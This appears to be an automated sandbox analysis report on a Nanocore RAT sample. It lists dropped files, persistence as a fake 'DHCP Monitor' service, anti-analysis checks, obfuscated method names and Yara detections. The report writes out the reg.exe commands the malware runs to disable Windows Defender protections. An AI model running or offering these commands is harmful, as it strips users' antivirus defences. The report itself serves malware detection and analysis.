          Source: 2.2.Service.exe.900000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs | High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
          Source: 16.0.dhcpmon.exe.c60000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs | High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
          Source: 16.0.dhcpmon.exe.c60000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs | High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
          Source: 16.2.dhcpmon.exe.c60000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs | High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
          Source: 16.2.dhcpmon.exe.c60000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs | High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

          Persistence and Installation Behavior:

          Uses cmd line tools excessively to alter registry or file data
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | File created: C:\Users\user\Desktop\Service.exe
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | File created: C:\Users\user\Desktop\Main.exe
          Source: C:\Users\user\Desktop\Service.exe | File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
          Source: C:\Users\user\Desktop\Service.exeFile opened: C:\Users\user\Desktop\Service.exe:Zone.Identifier read attributes | delete
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Main.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Main.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Main.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Main.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Service.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Main.exe | Window / User API: threadDelayed 381
          Source: C:\Users\user\Desktop\Service.exe | Window / User API: threadDelayed 365
          Source: C:\Users\user\Desktop\Service.exe | Window / User API: threadDelayed 980
          Source: C:\Users\user\Desktop\Service.exe | Window / User API: foregroundWindowGot 1011
          Source: C:\Users\user\Desktop\Service.exe | Window / User API: foregroundWindowGot 370
          Source: C:\Users\user\Desktop\Main.exe TID: 6496 | Thread sleep count: 381 > 30
          Source: C:\Users\user\Desktop\Service.exe TID: 6644 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\Service.exe TID: 6640 | Thread sleep time: -160000s >= -30000s
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 7124 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | Code function: 0_2_0131A717 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | Code function: 0_2_0132BA20 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | Code function: 0_2_0133AC28 FindFirstFileExA,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | Code function: 0_2_0132DEAF VirtualQuery,GetSystemInfo,
          Source: C:\Users\user\Desktop\Service.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Main.exe | File opened: C:\Users\user\AppData\Local\Temp\DFA1.tmp
          Source: C:\Users\user\Desktop\Main.exe | File opened: C:\Users\user\AppData\Local\Temp\DFA1.tmp\DFA2.tmp
          Source: C:\Users\user\Desktop\Main.exe | File opened: C:\Users\user\AppData\Local\Temp\DFA1.tmp\DFA2.tmp\DFA3.tmp
          Source: C:\Users\user\Desktop\Main.exe | File opened: C:\Users\user\AppData\Local\
          Source: C:\Users\user\Desktop\Main.exe | File opened: C:\Users\user\
          Source: C:\Users\user\Desktop\Main.exe | File opened: C:\Users\user\AppData\
          Source: Service.exe, 00000002.00000002.605384365.0000000006490000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.338466953.0000018009A10000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.340883590.0000020660A30000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.343402991.0000020F76930000.00000002.00000001.sdmp, reg.exe, 0000000C.00000002.349421127.000001B6331E0000.00000002.00000001.sdmp, reg.exe, 0000000D.00000002.350811973.000001F44CBA0000.00000002.00000001.sdmp, reg.exe, 0000000E.00000002.353812253.000001D25D9A0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: Service.exe, 00000002.00000002.598779863.000000000109E000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW
          Source: Service.exe, 00000002.00000002.605384365.0000000006490000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.338466953.0000018009A10000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.340883590.0000020660A30000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.343402991.0000020F76930000.00000002.00000001.sdmp, reg.exe, 0000000C.00000002.349421127.000001B6331E0000.00000002.00000001.sdmp, reg.exe, 0000000D.00000002.350811973.000001F44CBA0000.00000002.00000001.sdmp, reg.exe, 0000000E.00000002.353812253.000001D25D9A0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: Service.exe, 00000002.00000002.605384365.0000000006490000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.338466953.0000018009A10000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.340883590.0000020660A30000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.343402991.0000020F76930000.00000002.00000001.sdmp, reg.exe, 0000000C.00000002.349421127.000001B6331E0000.00000002.00000001.sdmp, reg.exe, 0000000D.00000002.350811973.000001F44CBA0000.00000002.00000001.sdmp, reg.exe, 0000000E.00000002.353812253.000001D25D9A0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: Service.exe, 00000002.00000002.598779863.000000000109E000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: Service.exe, 00000002.00000002.605384365.0000000006490000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.338466953.0000018009A10000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.340883590.0000020660A30000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.343402991.0000020F76930000.00000002.00000001.sdmp, reg.exe, 0000000C.00000002.349421127.000001B6331E0000.00000002.00000001.sdmp, reg.exe, 0000000D.00000002.350811973.000001F44CBA0000.00000002.00000001.sdmp, reg.exe, 0000000E.00000002.353812253.000001D25D9A0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Service.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | Code function: 0_2_0132F065 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\Main.exe | Code function: 1_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | Code function: 0_2_0133767E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | Code function: 0_2_0133B910 GetProcessHeap,
          Source: C:\Users\user\Desktop\Service.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | Code function: 0_2_0132F1B3 SetUnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | Code function: 0_2_0132F065 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | Code function: 0_2_0132F38B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | Code function: 0_2_013387FF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\Service.exe | Memory allocated: page read and write | page guard
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | Process created: C:\Users\user\Desktop\Main.exe 'C:\Users\user\Desktop\Main.exe'
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | Process created: C:\Users\user\Desktop\Service.exe 'C:\Users\user\Desktop\Service.exe'
          Source: C:\Users\user\Desktop\Main.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\DFA1.tmp\DFA2.tmp\DFA3.bat C:\Users\user\Desktop\Main.exe'
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe Reg.exe query 'HKU\S-1-5-19\Environment'
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableAntiSpyware' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableBehaviorMonitoring' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableOnAccessProtection' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableScanOnRealtimeEnable' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableAntiSpyware' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableRoutinelyTakingAction' /t REG_DWORD /d '1' /f
          Source: Service.exe, 00000002.00000002.598779863.000000000109E000.00000004.00000020.sdmp | Binary or memory string: Program Manager
          Source: Service.exe, 00000002.00000002.599106978.0000000001830000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: Service.exe, 00000002.00000002.599106978.0000000001830000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: Service.exe, 00000002.00000002.599106978.0000000001830000.00000002.00000001.sdmp | Binary or memory string: &Program Manager
          Source: Service.exe, 00000002.00000002.599106978.0000000001830000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: Service.exe, 00000002.00000002.598779863.000000000109E000.00000004.00000020.sdmp | Binary or memory string: Program Manager`
          Source: Service.exe, 00000002.00000002.601487158.0000000003210000.00000004.00000001.sdmp | Binary or memory string: Program ManagerXt
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | Code function: 0_2_013200B8 cpuid
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | Code function: GetLocaleInfoW,GetNumberFormatW,
          Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | Code function: 0_2_0132D711 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe | Code function: 0_2_0131AE15 GetVersionExW,
          Source: C:\Users\user\Desktop\Service.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected Nanocore RAT
          Source: Yara match | File source: 00000010.00000002.377390680.0000000004421000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.604957919.0000000005840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.597461394.0000000000902000.00000002.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.603266642.00000000041BA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.377356574.0000000003421000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.376298581.0000000000C62000.00000002.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000000.357721819.0000000000C62000.00000002.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: Service.exe PID: 6520, type: MEMORY
          Source: Yara match | File source: Process Memory Space: dhcpmon.exe PID: 7056, type: MEMORY
          Source: Yara match | File source: C:\Users\user\Desktop\Service.exe, type: DROPPED
          Source: Yara match | File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
          Source: Yara match | File source: 2.2.Service.exe.41d2a15.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 16.0.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.Service.exe.5844629.10.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.Service.exe.41ce3ec.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.Service.exe.900000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.Service.exe.41ce3ec.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 16.2.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 16.2.dhcpmon.exe.4472a15.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.Service.exe.5840000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 16.2.dhcpmon.exe.44695b6.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 16.2.dhcpmon.exe.446e3ec.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.Service.exe.5840000.9.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.Service.exe.41c95b6.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.Service.exe.900000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 16.2.dhcpmon.exe.446e3ec.5.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Detected Nanocore Rat
          Source: Service.exe | String found in binary or memory: NanoCore.ClientPluginHost
          Source: Service.exe, 00000002.00000002.603266642.00000000041BA000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
          Source: dhcpmon.exe | String found in binary or memory: NanoCore.ClientPluginHost
          Source: dhcpmon.exe, 00000010.00000002.377390680.0000000004421000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
          Source: dhcpmon.exe.2.dr | String found in binary or memory: NanoCore.ClientPluginHost
          Yara detected Nanocore RAT
          Source: Yara match | File source: 00000010.00000002.377390680.0000000004421000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.604957919.0000000005840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.597461394.0000000000902000.00000002.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.603266642.00000000041BA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.377356574.0000000003421000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.376298581.0000000000C62000.00000002.00020000.sdmp, type: MEMORY
